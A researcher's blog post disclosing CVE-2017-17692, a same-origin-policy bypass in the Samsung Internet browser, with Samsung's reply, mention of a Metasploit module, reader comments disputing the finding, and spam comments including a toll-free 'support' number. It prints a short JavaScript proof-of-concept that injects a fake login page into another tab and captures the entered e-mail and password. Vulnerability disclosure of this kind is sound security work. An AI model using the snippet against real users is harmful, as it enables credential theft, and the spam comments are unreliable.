Samsung Internet Browser SOP Bypass - CVE-2017-17692

Hi Internet,

Product : Samsung S7 Edge
Product Affected : Samsung Internet browser stable version.

I am using the above product and the updated version for the browser however below are the following steps where SOP bypass can take place.

Snip Code: (Spoof.html)
function go(){
setTimeout(function(){x.document.body.innerHTML='<h1>Please login</h1>';a=x.prompt('E-mail','');b=x.prompt('Password','');alert('E-mail: '+a+'\nPassword: '+b)},3000);
<button onclick="go()">go</button>

Steps :
1. Open spoof.html
2. Press Go
3. The page redirects to
4. Which give a fake pop up to user by saying enter UserName and Password (Address Bar Spoofing)
5. Once submitted the username and password is shared back to the parent tab which is sign of SOP bypass.

Samsung replied:
Dear Dhiraj,

We would like to thank you for sharing a potential security issue for Samsung mobile device.
We looked into the issue and found that the issue was already patched.

The patch is already preloaded in our upcoming model Galaxy Note8, and the application will be updated via Apps store update in October.

Thank you very much in advance for your cooperation.

Very Respectfully,
Samsung Mobile Security

Development of Metasploit Module:
As the above exploit code impacts most of the OLD Android Stock Browsers, I taught of developing an MSF module for the same, and informed MITRE to assign CVE. Where i got CVE-2017-17692 assigned to this issue from MITRE.

Here is the,
Source Code for Bypassing Same Origin Policy in Samsung Internet Browser in Metasploit

I would like to thank Tod Beardsley and Jeffrey Martin from Rapid7 team for making this possible.

Happy #HaXmas! Tod Beardsley kicks off our twelve-day series with a story of how we worked with me to develop and land an SOP bypass module this fall. The true meaning of Metasploit: 



  1. Hi Dhiraj,

    Thanks for the write up. I am not able to understand where exactly is the vulnerability is; if the attacker is able to get the details of (as per your poc); then yes it is an attack. however, it is a fake popup asking for email and password, just that it is on the next tab. tab browsing is accordance to the SOP only.

    1. Indeed, the tab gives a fake pop-up created by attacker on origin of once done its passes the credential from to attacker's origin and passing such sensitive information from one origin to different one concluded me to be SOP Bypass, hope i was able to explain :)

    2. unfortunately I am unable to understand with your explanation as well. In your post you have mentioned the pop up u created via address bar spoofing, and the pop up is a fake popup, the origin of the pop up is your code on your localhost and not, as the request for itself is not going from the browser tab. this could be a case of phishing, but how come the SOP bypass?? Sorry for being silly but i am really not able to connect to it.

    3. In this case when HTML code is executed it opens a parent tab (Attacker Tab) which initially has 'Go' button for now and have address bar which is a different origin.

      Once clicked on the parent tab, a child tab open's up with address bar which is of a different origin and gives a fake pop up to provide login credentials once given, the data is passed back to the parent tab.

      Passing data from child tab to parent tab and having different origin concludes this to be SOP Bypass in Samsung Internet Browser

  2. New samsung s9 models will have big storage

  3. Thanks for sharing such good information. It is really nice and informative.
    Keep it up!!!
    Get best tool for Browser hijacker removal.

  4. Never came across such an informative platform. It made me understand the basics of malware and adware. Thanks!

  5. Your blog is incredible. I am actually delighted to read this post that carries a lot of helpful information. Your content is very useful to understand and now I also get the concept of comments in WordPress. Thanks for sharing with me.Great post. I have been commenting a lot on several blogs lately, but I hadn’t thought about my approach before you brought it up. I’m going to refine my strategy now that I’ve read this. And yeah, I am definitely sharing this on Facebook and Twitter, too. Thanks! best auto liker

  6. If you are facing any problem for browser customer support then you can visits right place here we offer temporary data issue. In some case you don't know how to do that then call us on our toll-free no +1 888 509 9555.

  7. This is a great inspiring article.I am pretty much pleased with your good work.You put really very helpful information.
    Read article on Winter Tips For Elders.
    Read latest Blogs on Importance of Enterprise Contract Management.
    Read my blog on Safety Tips for Working at Heights
    Read My article on Benefits Of Dental Implants.

  8. This is a great inspiring article.I am pretty much pleased with your good work.You put really very helpful information.
    Read article on Winter Tips For Elders.